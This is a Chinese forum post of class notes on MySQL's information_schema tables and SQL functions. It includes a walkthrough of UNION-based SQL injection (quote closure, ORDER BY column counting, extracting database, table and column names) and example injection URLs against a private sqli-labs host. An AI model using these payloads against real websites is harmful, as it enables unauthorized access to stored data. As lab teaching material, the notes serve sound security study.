发帖
 找回密码
 立即注册
搜索
0 0

分享 第十二课 MySQL 重要库表学习

技术分享 980 0 2025-3-30 23:43:52
1. 课程内容概要(简要概括本次课程的主要内容,不需要太详细,但要能快速回忆起本节课的知识点)

主要知识点1:MySQL 重要库表




2.重点知识与细节(针对本节课的核心内容进行详细记录,包含公式、代码、重要原理等)
联合查询
union select
MySQL 重要库表
SCHEMATA
⾥⾯存放的是所有的数据库的信息
TABLES
⾥⾯存放的是所有的表的信息
COLUMNS
⾥⾯存放的是所有字段的信息
1. information_schema数据库简介
这个数据库⾥⾯存放了所有数据的库名、表名、字段名、权限等等信息
在MySQL中,把 information_schema 看作是⼀个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,⽽不是基本表,因此,你将⽆法看到与之相关的任何⽂件。】



2.Information_schema数据库表说明
1、 SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。
2、 TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表
引擎,创建时间等信息。是show tables from schemaname的结果取之此表。
3、 COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from
schemaname.tablename的结果取之此表。
4、 STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。
5、 USER_PRIVILEGES(⽤户权限)表:给出了关于全程权限的信息。该信息源⾃ mysql.user授权表。是⾮标准
表。
6、 SCHEMA_PRIVILEGES(⽅案权限)表:给出了关于⽅案(数据库)权限的信息。该信息来⾃ mysql.db授权
表。是⾮标准表。
7、 TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源⾃ mysql.tables_priv授权表。是⾮标准
表。
8、 COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源⾃ mysql.columns_priv授权表。是
⾮标准表。
9、 CHARACTER_SETS(字符集)表:提供了mysql实例可⽤字符集的信息。是SHOW CHARACTER SET结果集取
之此表。
10、 COLLATIONS表:提供了关于各字符集的对照信息。
11、 COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可⽤于校对的字符集。这些列等效于SHOW
COLLATION的前两个显示字段。
12、 TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。
13、 KEY_COLUMN_USAGE表:描述了具有约束的键列。
14、 ROUTINES表:提供了关于存储⼦程序(存储程序和函数)的信息。此时, ROUTINES表不包含⾃定义函数
(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。
15、 VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则⽆法查看视图信息。
16、 TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表



3.Information_schema数据库使⽤
对于 Information_schema 数据库重点需要了解 schemate , tables , columns 这三张表。

1、查看 schemata 这张表的 schema_name 这⼀个字段 存储整个mysql的库
2、查询数据库版本 Select version();
3、取库名 Select schema_name from information_schema.schemata;
这个命令就和 show databases; ⼀样
4、查看 tables 这表的 table_name 字段 存储的是 每⼀个库的表的名称
5、取表名 Select table_name form information_schema.tables where table_schema='库名';
6、查看 columns 这个表 column_name 这个字段 存储的是整个库的表的所有字段
7、取字段 Select column_name form information_schema.columns where table_schema='库名' and
table_name='表名';

http://10.211.55.3/sqli/Less-1/?id=1%27%20order%20by%204%20%23
http://10.211.55.3/sqli/Less-1/?id=1' order by 4 #


判断闭合
oder by 判断字段数
union select 找到能够显示数据的字段位置获取数据库名
获取表名
获取列名
获取具体数据



课堂sql语句

SELECT * from test where id = -1 union SELECT 10,20,30,40,50 SELECT "hello"
#查询语句
select user FROM test where id = 1 and pass = "abcd" union SELECT VERSION() #联合注⼊漏洞#通过⾃带数据获取数据
#获取⽬标的所有数据库名称



select user FROM test where id = -1 and pass = "abcd" UNION SELECT schema_name from information_schema.SCHEMATA #联合注⼊漏洞
SELECT user FROM test WHERE id = -1 AND pass = 'abcd' UNION SELECT CONVERT(schema_name USING utf8mb4) COLLATE utf8mb4_general_ci FROM information_schema.SCHEMATA;
#获取⽬标的指定数据库⾥⾯,数据表的名称
SELECT table_name from information_schema.TABLES where table_schema = "yijin"
#获取⽬标的指定数据库⾥⾯,指定数据表的字段名称
SELECT COLUMN_NAME FROM information_schema.COLUMNS where TABLE_SCHEMA = "yijin" and TABLE_NAME = "test"
#获取具体数据
SELECT id from yijin.test

SELECT user from yijin.test
SELECT pass from yijin.test
SELECT username,password,path,img,xxx,xxx from xxx where id=3 order by 3
SELECT username,password,xxx from xxx where id=3 union select 1,2,3;
order by 3
SELECT * from test order by 6
select 1,2,schema_name from information_schema.schemata

limit



作业
一、 常用的sql函数有哪些?
常用的聚合函数
COUNT(),SUM(),AVG(),MIN(),MAX()。
COUNT():计数,返回每组的行数,也会返回有NULL值的列,可用于数字和字符列。
SUM():返回每组数值的总和,忽略NULL值,仅用于数字列。
AVG():返回每组数值的平均值,忽略NULL值,仅用于数字列。
MIN():返回每组数据的最小值,忽略NULL值,可用于数字、字符和日期时间列。
MAX():返回每组数据的最大值,忽略NULL值,可用于数字、字符和日期时间列。
条件判断-if函数
If(expression,v1,v2) 表达式为真,返回v1, 否则返回v2


窗口函数
函数名()over (partition by col1,col2 order by col3 desc/asc, col4 desc/asc) as new_col


排序窗口函数的区别
ROW_NUMBER():按照顺序进行排序(1、2、3…)
RANK():并列排序,会跳过重复的序号(1、1、3…)
DENSE_RANK():并列排序,不会跳过重复的序号(1、1、2…)


二、 information_schema数据库里面重点应该关注哪些数据表?
1、 SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

2、 TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表

引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

3、 COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from

schemaname.tablename的结果取之此表。

4、 STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

5、 USER_PRIVILEGES(⽤户权限)表:给出了关于全程权限的信息。该信息源⾃ mysql.user授权表。是⾮标准

表。

6、 SCHEMA_PRIVILEGES(⽅案权限)表:给出了关于⽅案(数据库)权限的信息。该信息来⾃ mysql.db授权

表。是⾮标准表。

7、 TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源⾃ mysql.tables_priv授权表。是⾮标准

表。

8、 COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源⾃ mysql.columns_priv授权表。是

⾮标准表。

9、 CHARACTER_SETS(字符集)表:提供了mysql实例可⽤字符集的信息。是SHOW CHARACTER SET结果集取

之此表。

10、 COLLATIONS表:提供了关于各字符集的对照信息。

11、 COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可⽤于校对的字符集。这些列等效于SHOW

COLLATION的前两个显示字段。

12、 TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

13、 KEY_COLUMN_USAGE表:描述了具有约束的键列。

14、 ROUTINES表:提供了关于存储⼦程序(存储程序和函数)的信息。此时, ROUTINES表不包含⾃定义函数

(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

15、 VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则⽆法查看视图信息。

16、 TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表
三、 通过information_schema查询库名、表名、以及自己创建的数据表的字段名和具体数据

取库名 Select schema_name from information_schema.schemata;
Select table_name form information_schema.tables where table_schema='ross';
Select column_name form information_schema.columns where table_schema='ross' and table_name='test';
SELECT id from ross.test

SELECT user from ross.test
SELECT pass from ross.test


──── 0人觉得很赞 ────
免责声明:
1、本论坛中所有用户发布的内容仅代表作者个人观点,与本网站立场无关,本站不对其真实性、完整性或观点承担任何责任。
2、本论坛所提供的全部信息与内容,不保证其准确性、完整性或时效性。因阅读或使用本站内容而产生的任何误导、损失或风险,本站概不承担任何连带或法律责任。
3、当国家司法、行政机关依照法定程序要求本论坛披露用户信息时,本站予以配合并因此免责。
4、因网络线路故障、技术问题、不可抗力或本站无法控制的其他原因导致的服务中断或暂停,本站不承担由此造成的任何直接或间接损失。
5、对于任何通过技术手段破坏、攻击本论坛系统或扰乱正常秩序的行为,本站有权采取包括但不限于限制账号、封禁账号、追究法律责任等措施。
您需要登录后才可以回帖 立即登录
高级模式
返回